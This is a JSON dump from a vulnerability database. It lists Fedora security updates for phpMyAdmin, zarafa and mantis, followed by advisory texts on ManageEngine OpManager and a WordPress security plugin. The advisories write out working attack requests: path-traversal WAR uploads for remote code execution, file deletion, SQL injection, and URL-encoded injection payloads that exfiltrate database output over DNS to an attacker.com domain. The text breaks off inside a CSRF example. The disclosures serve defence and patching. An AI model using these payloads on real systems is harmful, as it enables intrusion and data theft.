"LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449"], "modified": "2014-08-30T03:55:03", "id": "FEDORA:66760238CC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EP5ZMTAM36HIE4QCXG3URL7CDMR4TWMO/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The Open Source Collaboration provides an integration with your existing Linux mail server, native mobile phone support by ActiveSync compatibility and a webaccess with 'Look & Feel' similar to Outlook using Ajax. Including an IMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open Source Collaboration can combine the usability with the stability and the flexibility of a Linux server. The proven Zarafa groupware solution is using MAPI objects, provides a MAPI client library as well as programming interfaces for C++, PHP and Python. The other Zarafa related packages need to be installed to gain all features and benefits of the Zarafa Collaboration Platform (ZCP). ", "cvss3": {}, "published": "2014-09-02T06:45:25", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: zarafa-7.1.10-4.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449"], "modified": "2014-09-02T06:45:25", "id": "FEDORA:614A323504", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2QNALKONU4O6C43BBUU74ZKEE7BMGQM7/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-08-28T15:35:08", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.7.1-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-28T15:35:08", "id": "FEDORA:1F3CA239E0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/K666AQ7U2PTC4MOGZSNEM5NE7HIBHI4L/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-08-24T02:55:48", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: phpMyAdmin-4.2.7.1-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-24T02:55:48", "id": "FEDORA:BB5EF22D81", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QGXDY5AULXTSBSVPNQWHIF47ZXXJ2Y5J/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Mantis is a free popular web-based issue tracking system. It is written in the PHP scripting language and works with MySQL, MS SQL, and PostgreSQL databases and a web server. Almost any web browser should be able to function as a client. Documentation can be found in: /usr/share/doc/mantis When the package has finished installing, you will need to perform some additional configuration steps; these are described in: /usr/share/doc/mantis/README.Fedora ", "cvss3": {}, "published": "2014-03-13T05:07:18", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mantis-1.2.17-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2014-2238"], "modified": "2014-03-13T05:07:18", "id": "FEDORA:69D4020E0D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JR23HGSGT4TZ4VAF37BJUV4TIYD5737S/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-09-23T04:32:06", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: phpMyAdmin-4.2.8.1-2.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-23T04:32:06", "id": "FEDORA:04AEA22A8A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/K4RF6EKNKZ2LO37TQKVLRROXCLFHBJG2/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-09-25T10:40:40", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.8.1-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-25T10:40:40", "id": "FEDORA:F19B522529", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/G55WSHGPZDZ5KKRYXPYNWQWZCYYFMNSC/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-09-25T10:43:07", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: phpMyAdmin-4.2.8.1-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-25T10:43:07", "id": "FEDORA:02C52225B7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/U6WA3XCMLGSRPK226SBKLKRYVHMVUBGN/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-10-05T08:14:21", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: phpMyAdmin-4.2.9.1-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-05T08:14:21", "id": "FEDORA:BD7C421498", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XTHGVIHNRMZTG5W7VU7GOJTBR6DUGYXF/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-10-08T19:06:12", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: phpMyAdmin-4.2.9.1-1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-08T19:06:12", "id": "FEDORA:F358E22606", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BPAZTXN4K34MI53DVT74L6UTHNNE6CIH/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:52", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "cvss3": {}, "published": "2014-10-11T06:52:59", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.9.1-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-11T06:52:59", "id": "FEDORA:7C03E60CF28A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Y23ELHUKCRQBQFKM6TBL5TSMFULT6HL4/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2014-11-09T00:00:00", "title": "ManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "id": "EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF", "href": "", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n==========================================================================\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\n\n>> Background on the affected products:\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\n\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\n\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\n\n\n>> Technical details:\n#1\nVulnerability: Remote code execution via WAR file upload\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nCVE-2014-6034\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\n<... WAR file payload ...>\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\nA Metasploit module that exploits this vulnerability has been released.\n\nb)\nCVE-2014-6035\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\n<... WAR file payload ...>\n\nAffected versions: OpManager v? to v11.4\n\n\n#2\nVulnerability: Arbitrary file deletion\nCVE-2014-6036\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\n\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\n\n\n#3\nVulnerability: Remote code execution via file upload\nCVE-2014-7866\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\nb)\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\n\n#4\nVulnerability: Blind SQL injection\nCVE-2014-7868\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\nb)\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\n\n\n>> Fix:\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\nResolves #1 and #2\n\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\nResolves #3\n\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\nResolves #4\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:05:05", "description": "\nWordPress Plugin All In One WP Security 3.8.2 - SQL Injection", "edition": 2, "published": "2014-09-25T00:00:00", "title": "WordPress Plugin All In One WP Security 3.8.2 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "EXPLOITPACK:21A82635D94869A46B5D9E35EAC465C9", "href": "", "sourceData": "Advisory ID: HTB23231\nProduct: All In One WP Security WordPress plugin\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \nVulnerable Version(s): 3.8.2 and probably prior\nTested Version: 3.8.2\nAdvisory Publication: September 3, 2014 [without technical details]\nVendor Notification: September 3, 2014 \nVendor Patch: September 12, 2014 \nPublic Disclosure: September 24, 2014 \nVulnerability Type: SQL Injection [CWE-89]\nCVE Reference: CVE-2014-6242\nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n\n\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\n\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\n\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\n\n<img 